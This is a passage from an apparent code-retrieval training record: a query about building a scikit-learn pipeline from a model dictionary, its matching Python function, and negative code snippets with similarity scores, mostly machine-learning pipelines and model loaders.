activation='relu')(image_input)\n\tbranch1_conv2=Conv2D(64, kernel_size=(1, 1), border_mode='same', activation='relu')(branch1_conv1)\t\n\tbranch1_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch1_conv1)\n\tbranch2_conv1=Conv2D(128, kernel_size=(3, 3), border_mode='same', activation='relu')(branch1_pool1)\n\tbranch2_conv2=Conv2D(128, kernel_size=(1, 1), border_mode='same', activation='relu')(branch2_conv1)\t\n\tbranch2_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch2_conv2)\n\tbranch3_conv1=Conv2D(128, kernel_size=(3, 3), border_mode='same', activation='relu')(branch2_pool1)\n\tbranch3_conv2=Conv2D(128, kernel_size=(1, 1), border_mode='same', activation='relu')(branch3_conv1)\t\n\tbranch3_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch3_conv2)\n\tbranch4_conv1=Conv2D(128, kernel_size=(3, 3), border_mode='same', activation='relu')(branch3_pool1)\n\tbranch4_conv2=Conv2D(128, kernel_size=(1, 1), border_mode='same', activation='relu')(branch4_conv1)\t\n\tbranch4_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch4_conv2)\n\tbranch5_conv1=Conv2D(128, kernel_size=(3, 3), border_mode='same', activation='relu')(branch4_pool1)\n\tbranch5_conv2=Conv2D(128, kernel_size=(1, 1), border_mode='same', activation='relu')(branch5_conv1)\t\n\tbranch5_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch5_conv2)\n\tbranch6_conv1=Conv2D(128, kernel_size=(3, 3), border_mode='same', activation='relu')(branch5_pool1)\n\tbranch6_conv2=Conv2D(128, kernel_size=(1, 1), border_mode='same', activation='relu')(branch6_conv1)\t\n\tbranch6_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch6_conv2)\n\tbranch1_flat=Flatten()(branch6_pool1)\n\tdrop=Dropout(.3)(branch1_flat)\n\t# FC layers group\n\tdense1=Dense(512, activation='relu', name='fc1')(drop)\n\tdrop1=Dropout(.3)(dense1)\n\tdense2=Dense(256, 
activation='relu', name='fc2')(drop1)\n\tdrop3=Dropout(.3)(dense2)\n\tout=Dense(2, activation='softmax', name='fc4')(drop3)\n\tmodel=Model(inputs=image_input,outputs=out)\n\treturn model", "def pipeline(self):\n predicted, real = self.surface_segmentation()\n # print(predicted[0:10])\n # print(len(predicted))\n test_file = \"../morphology/\" + self.language + \"/\" + self.language + \".clean.test.conll\"\n input_file = open(os.path.join(sys.path[0], test_file), 'r')\n segmented_words = []\n\n # Only one entry per word for dictionary\n\n words = []\n labels = []\n for line in input_file.readlines():\n tmp = line.rstrip('\\n').split(\" | \")[0]\n label_arr = line.rstrip('\\n').split(\" | \")[2]\n label_arr = get_labels(label_arr)\n if tmp not in words:\n words.append(tmp)\n labels.append(label_arr)\n\n segmented_words = []\n for word, label in zip(words, predicted):\n tmp = []\n for i in range(len(label)):\n if label[i] == \"S\" or label[i] == \"E\":\n tmp.append(word[i])\n tmp.append(\"-\")\n else:\n tmp.append(word[i])\n tmp = \"\".join(tmp).rstrip(\"-\")\n segmented_words.append(tmp)\n\n features = surface_labelled_data_preparation_pipeline(segmented_words)\n predicted, test = self.__surface_labelled_segmentation_pipeline(features)\n return predicted, labels", "def create_model(self):\r\n model = self.model_fn(self.flags)\r\n print(model)\r\n return model", "def _pipeline(self, vectorizer, n_features, ngram_range, C):\n classifier = SVC(kernel=\"linear\", C=C, max_iter=1000000, shrinking=1, tol=0.0001)\n vectorizer.set_params(stop_words=None, max_features=self.max_features, ngram_range=ngram_range)\n \n checker_pipeline = Pipeline([\n ('vectorizer', vectorizer),\n ('reduce_dim', SelectKBest(chi2, k=n_features)),\n ('classify', classifier)])\n\n return checker_pipeline" ]
[ "0.62133336", "0.619528", "0.6192642", "0.6129727", "0.60924697", "0.60888034", "0.60504484", "0.59715533", "0.59501135", "0.5866584", "0.58635634", "0.5856176", "0.57757", "0.5774506", "0.5752574", "0.5752574", "0.5741443", "0.5726265", "0.5723943", "0.5714648", "0.57145613", "0.5708808", "0.5668033", "0.56536686", "0.5649134", "0.5647488", "0.56460094", "0.56338537", "0.56114775", "0.5608913", "0.5587885", "0.5586228", "0.5573341", "0.55610096", "0.5551505", "0.5538759", "0.5538214", "0.5538214", "0.5522836", "0.55221957", "0.5510209", "0.5509636", "0.5507337", "0.55068356", "0.5503484", "0.5501202", "0.54995537", "0.5490917", "0.5476767", "0.54657876", "0.54601514", "0.5457365", "0.54506356", "0.54441607", "0.54375184", "0.5431834", "0.54136336", "0.54114294", "0.54016984", "0.5398169", "0.53939414", "0.53783596", "0.53783596", "0.536577", "0.53626204", "0.5342835", "0.53339523", "0.5333814", "0.53189003", "0.53188294", "0.5309592", "0.5307904", "0.5303339", "0.53029984", "0.5293686", "0.52923054", "0.5290182", "0.52798885", "0.52794534", "0.52762806", "0.526934", "0.5266564", "0.5251469", "0.52510023", "0.52486825", "0.52482706", "0.52479917", "0.52441686", "0.5243538", "0.5235079", "0.5234209", "0.5231744", "0.52274525", "0.5225956", "0.52231324", "0.522182", "0.5212851", "0.5206044", "0.52043307", "0.5203128", "0.5185338" ]
0.0
-1
return a model as defined in model_search.yaml
def get_model_from_yaml(name):
    filename = pkg_resources.resource_filename('empirical_lsm', 'data/model_search.yaml')

    with open(filename) as f:
        model_dict = yaml.load(f)[name]

    return get_model_from_dict(model_dict)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_model(model=gin.REQUIRED):\n return model", "def get_model(*args):\n return Model()", "def get_model(model):\n all_models = cmd.get_object_list()\n\n if len(all_models) == 0:\n logging.parser_error('No models are opened.')\n return\n\n model = model.lower()\n\n if model and (model in all_models):\n return model\n\n if len(all_models) > 1:\n logging.parser_error(\"Please specify which model you want to use. {}\".format(all_models))\n return\n\n return all_models[0]", "def get_model(params):\r\n module_name, class_name = params.model.name.rsplit('.', 1)\r\n i = importlib.import_module(module_name)\r\n return getattr(i, class_name)", "def get_model(model_name):\n module_name = 'strain.models.strain_' + model_name.lower()\n model_module = importlib.import_module(module_name)\n obj = getattr(model_module, model_name)\n return obj", "def get_model_definition(request):\n modelname = request.matchdict['modelname']\n results = db_model_definition(request.db)[modelname]\n for result in results:\n return result.value\n raise NotFound(\"Unknown model %s\" % modelname)", "def model(self) -> Type[Model]:", "def model() -> Model:\n return Model()", "def get_model_by_name(cls, name):\n model_name = inflection.camelize(name) # class name of the model to use\n model = cls.models[model_name]\n return model", "def get_model(*, name: str) -> typing.Optional[typing.Type]:\n return getattr(open_alchemy.models, name, None)", "def model(self) -> 'outputs.ModelDefinitionResponse':\n return pulumi.get(self, \"model\")", "def model(self):\n return MODELS.get(self._model,self._model)", "def get_model(self):\n raise NotImplementedError(\n \"You must provide a 'get_model' method for the '%r' index.\" % self\n )", "def _get_card_model(self, model: str) -> Any:\n return self.collection.models.byName(model)", "def get_model():\n return UNISAL", "def get_model(name, **model_args):\n module = importlib.import_module('.' 
+ name, 'models')\n return module.build_model(**model_args)", "def search_model():\n search_condition = request.stream.read()\n try:\n search_condition = json.loads(search_condition if search_condition else \"{}\")\n except Exception:\n raise ParamValueError(\"Json data parse failed.\")\n\n model_lineage_info = _get_lineage_info(\n lineage_type=\"model\",\n search_condition=search_condition\n )\n\n return jsonify(model_lineage_info)", "def get_model(self, name):\n bundle_name, model_name = name.split(\".\")\n bundle = self.bundles[bundle_name]\n model = bundle.models[name]\n return model", "def retrieve_model(self, model_name):\n\t\tmodel_detail = dbop.get_model(self, model_name)\n\t\t#since the 'owner' field of model_detail is only owner's username,\n\t\t#we have to change it to a User object\n\t\t#In this case, the owner of this model is the user itself\n\t\tmodel_detail['owner'] = self\n\t\tif model_detail['model_type'] == 'SPSS Predictive Model':\n\t\t\treturn model.SPSSModel(**model_detail)\n\t\telif model_detail['model_type'] == 'DashDB In-database Model':\n\t\t\treturn model.DashdbModel(**model_detail)", "def get_model(self, key: str = None, **kwargs) -> Dict:\n raise NotImplementedError", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def model_class(self):\n model_name = self.model_name()\n\n if not model_name:\n return None\n\n try:\n (app, mdl) = model_name.strip().split('.')\n except ValueError:\n logger.error(f\"Invalid 'model' parameter for setting {self.key} : '{model_name}'\")\n return None\n\n app_models = apps.all_models.get(app, None)\n\n if app_models is None:\n logger.error(f\"Error retrieving model class '{model_name}' for setting '{self.key}' - no app named '{app}'\")\n return None\n\n model = app_models.get(mdl, None)\n\n if model is None:\n logger.error(f\"Error retrieving model class '{model_name}' for setting '{self.key}' - no model named '{mdl}'\")\n return None\n\n # Looks like we have found a model!\n return model", "def find_model_using_name(model_name):\n model_filename = \"models.\" + model_name + \"_model\"\n modellib = importlib.import_module(model_filename)\n model = None\n target_model_name = model_name.replace('_', '') + 'model'\n for name, cls in modellib.__dict__.items():\n if name.lower() == target_model_name.lower() \\\n and issubclass(cls, BaseModel):\n model = cls\n\n if model is None:\n print(\"In %s.py, there should be a subclass of BaseModel with class name that matches %s in lowercase.\" % (model_filename, target_model_name))\n exit(0)\n\n return model", "def model(self) -> str:\n ...", "def load_model(self) -> Any:", "def get_model(recipe, **overrides):\n\n # \"model\", \"stages__*__model\"\n if isinstance(overrides, dict):\n recipe = {**recipe, **overrides} # override parameters\n\n return get_instance(**recipe) # expand (shallow copy)", "def default_model():\n return \"teenytweetynet\"", "def get_model(self) -> BaseLanguageModel:\n model = available_models[self.model_name.value]\n kwargs = model._lc_kwargs\n secrets = {secret: getattr(model, secret) for secret in model.lc_secrets.keys()}\n kwargs.update(secrets)\n\n model_kwargs = 
kwargs.get(\"model_kwargs\", {})\n for attr, value in self.dict().items():\n if attr == \"model_name\":\n # Skip model_name\n continue\n if hasattr(model, attr):\n # If the model has the attribute, add it to kwargs\n kwargs[attr] = value\n else:\n # Otherwise, add it to model_kwargs (necessary for chat models)\n model_kwargs[attr] = value\n kwargs[\"model_kwargs\"] = model_kwargs\n\n # Initialize a copy of the model using the config\n model = model.__class__(**kwargs)\n return model", "def get_model_reference(self, model_name):\n\n print_debug(\"Geting model :\" + model_name)\n model = ModelsFactory.get(model_name=model_name)\n return model", "def get_model(config):\n if not isinstance(config, ModelConfig):\n raise ValueError(\"Get model must be a config file. \")\n\n identifier = str(config.class_id).lower()\n if identifier in ['vgg', 'vgg16', 'vgg19']:\n return vgg.get_model(config)\n elif identifier in ['resnet', 'resnet50',]:\n return resnet.get_model(config)", "def model(self):\n return self.model_", "def get_model(self):\n # just return the first model, since all replicas are the same\n return self.call_async(0, '_async_get_model').gen()", "def model():\n global _cached_model\n if _cached_model:\n return _cached_model\n model = models.Root(os.path.join(app.root_path, '..'))\n if not app.config['DEBUG']:\n _cached_model = model\n return model", "def get_model(self):\n return Doc()", "def get_model():\n global model\n if model is None:\n model = AppModel()\n model.load_resources()\n return model", "def get_search_dao(self):\n if hasattr(self, 'search_model'):\n return self.search_model()\n raise NotImplementedError()", "def model(self) -> Model:\n return self.software_system.get_model()", "def real_model(request):\n return request.config.option.real_model", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def get_model(self):\n\t\treturn self.object.__class__", "def search_doc_type(self):\n return self._meta.model_name", "def model(self):\n return self.__model", "def _get_model_by_name(self):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData']\n col_headers = ['model_name']\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Initialize the persistent model\n self.model = PersistentModel()\n \n # Get the model name from the request dataframe\n self.model.name = self.request_df.loc[0, 'model_name']\n \n # Get the model from cache or disk\n self._get_model()\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(3)", "def build_model(cfg, **kwargs):\n name = cfg.name\n return MODEL_REGISTRY.get(name)(cfg=cfg, **kwargs)", "def get_model_by_name(self, model_name):\n models = ModelDirectory.get_model_by_name(model_name, pipeline=self)\n return models", "def model(self) -> Optional[str]:\n return pulumi.get(self, \"model\")", "def get_model(model_name: str, *args, **kwargs):\n try:\n if '.' in model_name:\n module_name, class_name = model_name.rsplit('.', 1)\n else:\n module_name = model_name\n class_name = model_name.capitalize().replace(\"_\",\"\")\n\n model_module = import_module('.' 
+ module_name, package='models')\n\n model_class = getattr(model_module, class_name)\n\n instance = model_class(*args, **kwargs)\n\n except (AttributeError, ModuleNotFoundError):\n raise ImportError('{} is not part of our model/architecture collection.'.format(model_name))\n else:\n if not issubclass(model_class, Model):\n raise ImportError(\"{} is not a valid model/architecture.\".format(model_class))\n\n return instance", "def load_model_from_catalog(name, as_builder=False):\n return catalog.get_model_from_catalog(name, as_builder=as_builder)", "def get_model(name):\n # Evil reflection\n model_name = name.lower()\n model_module = importlib.import_module('.'+model_name, cfg.model_pck)\n [(_, model_class)] = inspect.getmembers(\n model_module,\n lambda c: inspect.isclass(c) and sys.modules[c.__module__] == model_module)\n\n tf.logging.debug('Found class %s', model_class)\n return model_class", "def get_model(self):\n return QueryS", "def get_model(self):\n return self._model", "def get_model(self):\n return self._model", "def get_model(name):\n\n try:\n from .model_defs import get_model_from_def\n model = get_model_from_def(name)\n logger.info(\"Model {n} loaded from model_defs module\".format(n=name))\n except NameError:\n try:\n model = get_model_from_yaml(name)\n logger.info(\"Model {n} loaded from yaml\".format(n=name))\n except KeyError:\n try:\n from .model_defs import parse_model_name\n model = parse_model_name(name)\n logger.info(\"Model {n} parsed from name\".format(n=name))\n except NameError:\n sys.exit(\"Unknown model {n}\".format(n=name))\n\n if not hasattr(model, 'name'):\n model.name = name\n\n return model", "def get_model(self):\n return self.chain.model", "def get(self) -> CrosswalkModel | None:\n self._refresh_model_terms()\n return self.model", "def get_model(name, disable_logging=False):\n return PluginLoader._import(\"train.model\", name, disable_logging)", "def find(model: str, title: str = None, alias: str = None, language: str = None) -> odm.SingleModelFinder:\n f = taxonomy.find(model.format(model), language)\n\n if title:\n f.regex('title', '^{}$'.format(title), True)\n\n if alias:\n f.eq('alias', alias)\n\n return f", "def build_model():", "def get_model(self, app_label, model_name,\n seed_cache=True, only_installed=True):\n if seed_cache:\n self._populate()\n if only_installed and app_label not in self.app_labels:\n return None\n return self.app_models \\\n .get(app_label, SortedDict()) \\\n .get(model_name.lower())", "def model(self):\n return self._model", "def model(self):\n return self._model", "def model(self):\n return self._model", "def model(self):\n return self._model", "def model(self):\n return self._model", "def model_lookup(model_zoo: ModelZoo,\n label_set: LabelSetName,\n model_name: ModelName,\n frozen: bool) -> Model:\n for model in model_zoo.models:\n if model.label_set == label_set and model.model_name == model_name and model.frozen == frozen:\n return model\n else:\n return None", "def _default_make_sa_model(model):\n name = model._meta.object_name + \".__aldjemy__\"\n return type(name, (), {\"__module__\": model.__module__})", "def abstract_get(self, model, id=False):\n return self.env[model].sudo().browse(id) if id else self.env[model].search([])", "def get_model(self, model_id):\n if self.model_dict.has_key(model_id):\n return self.model_dict[model_id]\n return None", "def __getitem__(self, key):\n return self.get_models()[str(key)]", "def load_model(self):\n pass", "def find_model(config, obj, mods):\n for mod in mods:\n if mod[0] != 
config:\n continue\n\n if len(mod) == 2:\n return mod[1]\n\n if len(mod) == 3 and mod[1] in obj:\n return mod[2]\n\n return None", "def find_model(config, obj, mods):\n for mod in mods:\n if mod[0] != config:\n continue\n\n if len(mod) == 2:\n return mod[1]\n\n if len(mod) == 3 and mod[1] in obj:\n return mod[2]\n\n return None", "def _get_model(self) -> str:\n return str(self.hass.data[DOMAIN][self._config_entry.entry_id][ATTR_MODEL])", "def gen_model():\n\n\tmodel = skipthoughts.load_model()\n\treturn model", "def _get_model():\n with open('models/catapp_gp_model.pickle', 'rb') as modelfile:\n model = pickle.load(modelfile)\n return model", "def create_model(self):\n model = solph.Model(self.es)\n return model", "def getModel(self, *args):\n return _libsbml.SBMLValidator_getModel(self, *args)", "def search(self):\r\n return resource.Search(self)", "def get_model(self, full_name: Union[Type[Model], str], reference_model: Type[Model]):\n\n if isinstance(full_name, str):\n name_parts = full_name.split(\".\")\n if len(name_parts) == 1:\n return self.get_app_model(reference_model._meta.app_label, full_name)\n\n elif len(name_parts) == 2:\n return self.get_app_model(*name_parts)\n\n else:\n raise ConfigurationError('Model name needs to be in format \"app.Model\" or \"Model\"')\n\n elif inspect.isclass(full_name) and issubclass(full_name, Model):\n return full_name\n\n else:\n raise TypeError(f\"Cannot get model from {full_name}. Invalid type.\")", "def _get_model_from_table_name(table_name: str) -> Optional[Type[RDSModel]]:\n table_model = None\n try:\n if hasattr(Base, '_decl_class_registry'):\n models = Base._decl_class_registry.values() # sqlalchemy < 1.4\n else:\n models = Base.registry._class_registry.values()\n\n for model in models:\n if hasattr(model, '__tablename__') and model.__tablename__ == table_name:\n table_model = model\n except Exception as e:\n LOGGER.exception(f'Failed to get model for the table: {table_name} from rds model base')\n raise e\n\n return table_model", "def get_default_model():\n models = PluginLoader.get_available_models()\n return 'original' if 'original' in models else models[0]", "def get_model(self):\n url = self.resource()\n params = {'data': ''}\n resp = self._client.get(url, params=params)\n\n return resp.text", "def get_model_obj(self):\n if hasattr(self, 'model_obj'): return self.model_obj\n model_ct = ContentType.objects.get(\n app_label=self.kwargs.get('app_label'), model=self.kwargs.get('model'))\n self.model_obj = model_ct.model_class()\n return self.model_obj", "def get_model(word_to_idx, label_to_idx, resume=False, use_glove=True):\n\n best_acc = 0 # best test accuracy\n start_epoch = 0 # start from epoch 0 or last checkpoint epoch\n\n if resume:\n # load checkpoint\n checkpoint = load_checkpoint()\n model = checkpoint['model']\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch']\n else:\n print('==> Building model {}...'.format(cfg.RUN_MODE))\n if cfg.RUN_MODE in [\"RNN\", \"LSTM\", \"GRU\"]:\n model = BatchRNN(cfg.EMBEDDING_DIM, cfg.HIDDEN_DIM, cfg.BATCH_SIZE,\n len(word_to_idx), len(label_to_idx), rnn_model=cfg.RUN_MODE)\n else:\n model = CNN_NLP(cfg.EMBEDDING_DIM, cfg.HIDDEN_DIM, cfg.BATCH_SIZE,\n len(word_to_idx), len(label_to_idx))\n if use_glove:\n # model.load_glove_model('GloVe-1.2/vectors.txt', word_to_idx)\n model.load_glove_model(cfg.GLOVE_FILE, word_to_idx, regenerate=True)\n return model, best_acc, start_epoch", "def _search_model_extractor(self, repo_url):\n # Find model folder\n # The model name is the name of the 
author of the repository\n model_name = 'snippet_model_%s' % repo_url.split('/')[-2]\n # It is stored in the models_data folder\n models_data = Path(pkg_resources.resource_filename('credentialdigger',\n 'models_data'))\n dev_model = models_data / model_name\n\n # Find extractor binary\n # Get name and version from the metafile\n with open(dev_model / 'meta.json', 'r') as f:\n meta = json.loads(f.read())\n inner_folder = dev_model / ('%s-%s' % (meta['name'], meta['version']))\n # There should be only one binary in the inner folder\n extractor_file = list(inner_folder.glob('**/*.bin'))[0]\n\n return dev_model.name, extractor_file.name", "def model(self) -> Model:\n return self._model", "def _get_model(model_identifier):\n registry = Base._decl_class_registry\n Model = registry.get(model_identifier, None)\n if Model is None:\n raise base.DeserializationError(u\"Invalid model identifier: '%s'\" \\\n % model_identifier)\n return Model" ]
[ "0.72097623", "0.6948634", "0.67616165", "0.67475533", "0.66909075", "0.66902417", "0.66678", "0.6573517", "0.65641904", "0.65121186", "0.651177", "0.6477959", "0.6459214", "0.6455929", "0.64499646", "0.6413741", "0.6407674", "0.64009804", "0.6380913", "0.6357358", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.6314476", "0.630511", "0.6297346", "0.62917036", "0.62709826", "0.6261574", "0.6255416", "0.62477183", "0.6209037", "0.62045234", "0.6197182", "0.61875147", "0.6180646", "0.61802095", "0.6168577", "0.61603415", "0.6150952", "0.6148835", "0.6148835", "0.6148835", "0.6148835", "0.6148835", "0.61481947", "0.6120006", "0.6114671", "0.61094385", "0.609875", "0.6090517", "0.6066811", "0.6062011", "0.60562944", "0.60549396", "0.605192", "0.60493225", "0.60493225", "0.60459554", "0.60358566", "0.60357106", "0.60355043", "0.60266215", "0.60234725", "0.60228366", "0.60025465", "0.60025465", "0.60025465", "0.60025465", "0.60025465", "0.5994615", "0.5977134", "0.5945629", "0.5937925", "0.5926864", "0.591723", "0.5902715", "0.5902715", "0.5900628", "0.5894314", "0.5891494", "0.5889242", "0.58860976", "0.5877046", "0.58626276", "0.586035", "0.5850018", "0.58465767", "0.5840562", "0.58360696", "0.5831525", "0.58276325", "0.58119667" ]
0.6980467
1
Return a sklearn model pipeline from a model_dict
def get_model_from_dict(model_dict): pipe_list = [] if 'transforms' in model_dict: # For basic scikit-learn transforms transforms = model_dict['transforms'].copy() if 'scaler' in transforms: scaler = transforms.pop('scaler') pipe_list.append(get_scaler(scaler)) if 'pca' in transforms: transforms.pop('pca') pipe_list.append(get_pca()) if 'poly' in transforms: args = transforms.pop('poly') pipe_list.append(get_poly(args)) if len(transforms) > 0: raise Exception("unknown transforms: %s" % repr(transforms)) if 'args' in model_dict: model = get_model_class(model_dict['class'], model_dict['args']) else: model = get_model_class(model_dict['class']) if 'clusterregression' in model_dict: from empirical_lsm.clusterregression import ModelByCluster clusterer = model_dict['clusterregression']['class'] cluster_args = model_dict['clusterregression']['args'] model = ModelByCluster( get_clusterer(clusterer, cluster_args), model) pipe_list.append(model) pipe = make_pipeline(*pipe_list) if 'lag' in model_dict: params = model_dict['lag'] pipe = get_lagger(pipe, params) elif 'markov' in model_dict: params = model_dict['markov'] pipe = get_markov_wrapper(pipe, params) if 'forcing_vars' in model_dict: pipe.forcing_vars = model_dict['forcing_vars'] else: logger.warning("Warning: no forcing vars, using defaults (all)") pipe.forcing_vars = get_config(['vars', 'met']) if 'description' in model_dict: pipe.description = model_dict['description'] return pipe
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_pipeline(model):\n\n steps = [\n (\"imp\", SimpleImputer(strategy=\"most_frequent\")),\n (\"norm\", MinMaxScaler()),\n (\"reg\", model)\n ]\n pipeline = Pipeline(steps=steps)\n\n return pipeline", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def build_model():\n pipeline = Pipeline([\n ('vectorizer', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n # (), # Feature engineering (word2vec/GloVe)\n (\"clf\", MultiOutputClassifier(RandomForestClassifier(n_estimators=100), n_jobs=-1))\n ])\n\n return pipeline", "def make_full_pipeline(\n preprocess_pipe: ColumnTransformer, model: BaseEstimator\n) -> Pipeline:\n full_pipe = sklearn.pipeline.Pipeline(\n [(\"preprocess\", preprocess_pipe), (\"model\", model)]\n )\n return full_pipe", "def build_model():\n pipeline = Pipeline([\n ('features', FeatureUnion([\n\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n ('starting_verb', StartingVerbExtractor())\n ])),\n ('clf', DecisionTreeClassifier())\n ])\n\n parameters = [\n {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (DecisionTreeClassifier(min_samples_split=3),),\n 'clf__max_depth': (None, 4)\n }, {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (MultiOutputClassifier(LinearSVC(multi_class='ovr')),)\n }, {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (MLPClassifier(),),\n 'clf__hidden_layer_sizes': ((100, 10), (50,), (50, 10))\n }\n ]\n\n cv = GridSearchCV(pipeline, parameters, cv=3, n_jobs=4, verbose=10)\n \n return cv", "def build_model():\n pipeline = Pipeline([('cvect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(LinearSVC(multi_class=\"crammer_singer\"), n_jobs=1))\n ])\n\n parameters = {\n 'clf__estimator__C': 1,\n 'clf__estimator__max_iter': 1000 }\n \n model = GridSearchCV(pipeline, param_grid=parameters)\n\n\n return model", "def build_model():\n pipeline = Pipeline(\n [\n (\"vect\", CountVectorizer(tokenizer=tokenize)),\n (\"tfidf\", TfidfTransformer()),\n (\"clf\", MultiOutputClassifier(LinearSVC(dual=False))),\n ]\n )\n\n # use grid search to optimize the pipeline parameters\n parameters = {\"tfidf__use_idf\": (True, False), \"clf__estimator__C\": [1, 100]}\n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv", "def build_model():\n nltk.download(['punkt', 'wordnet', 
'averaged_perceptron_tagger', 'stopwords'])\n pipeline = Pipeline([\n ('features', FeatureUnion([\n \n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer())\n ])),\n \n ('strarting_verb', StartingVerbExtractor())\n \n ])),\n\n ('clf', MultiOutputClassifier(estimator = AdaBoostClassifier(random_state = 42)))\n\n ])\n \n parameters = {\"clf__estimator__learning_rate\": [0.1, 0.5, 1.0],\n \"clf__estimator__n_estimators\": [25, 50, 75]\n }\n \n from sklearn.model_selection import GridSearchCV\n cv = GridSearchCV(pipeline, param_grid = parameters) \n \n return cv", "def build_model():\n \n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize, max_df = 0.75, max_features = 5000, ngram_range = (1, 2))),\n ('tfidf', TfidfTransformer(use_idf = True)),\n ('clf', MultiOutputClassifier(estimator=RandomForestClassifier(n_estimators = 200, min_samples_split = 2)))\n ])\n \n return pipeline", "def build_model():\n \n pipeline = Pipeline([\n ('features', FeatureUnion([\n\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n\n ('starting_verb', StartingVerbExtractor())\n ])),\n\n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n])\n \n # specify parameters for grid search\n parameters = {\n 'features__text_pipeline__vect__ngram_range': ((1, 1), (1, 2)),\n 'features__text_pipeline__vect__max_df': (0.75, 1.0)\n }\n\n # create grid search object\n cv = GridSearchCV(pipeline, param_grid = parameters, n_jobs= 8, cv = 3, verbose = 2)\n\n return cv", "def create_pipeline(clf):\n return Pipeline([('scaler', MinMaxScaler()), ('clf', clf)])", "def model_pipeline(catnums):\n pipe = make_pipeline(\n Imputer(strategy='most_frequent'),\n OneHotEncoder(categorical_features=catnums, sparse=False),\n PolynomialFeatures(),\n Ridge(alpha=25)\n )\n return pipe", "def build_model():\n pipeline = Pipeline([\n ('features', FeatureUnion([\n \n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n\n ('starting_verb', StartingVerbExtractor())\n ])),\n \n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n ])\n\n # specify parameters for grid search\n parameters = {\n 'clf__estimator__n_estimators': [50],\n 'clf__estimator__learning_rate': [1]\n }\n\n # create grid search object\n cv = GridSearchCV(pipeline, param_grid=parameters)\n \n return cv", "def build_model():\n #\n pipeline = Pipeline([\n ('features', FeatureUnion([\n ('text_pipeline', Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),('tfidf', TfidfTransformer())])),\n ('starting_verb', StartingVerbExtractor())])),\n ('clf', RandomForestClassifier())\n ])\n \n # hyerparameters for grid to search within\n# parameters = [{'clf__bootstrap': [False, True],\n# 'clf__bootstrap': [False, True],\n# 'clf__n_estimators': [80,90, 100, 110, 130],\n# 'clf__max_features': [0.6, 0.65, 0.7, 0.73, 0.7500000000000001, 0.78, 0.8],\n# 'clf__min_samples_leaf': [10, 12, 14],\n# 'clf__min_samples_split': [3, 5, 7]\n# }\n# ]\n\n parameters = {\n 'features__text_pipeline__vect__ngram_range': ((1, 1), (1, 2)),\n 'features__text_pipeline__vect__max_df': (0.5, 0.75, 1.0),\n 'features__text_pipeline__vect__max_features': (None, 5000, 10000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf__n_estimators': [50, 80, 90, 100, 200],\n 'clf__min_samples_split': [2, 3, 4, 5, 7],\n 'features__transformer_weights': (\n {'text_pipeline': 1, 'starting_verb': 0.5},\n {'text_pipeline': 0.5, 
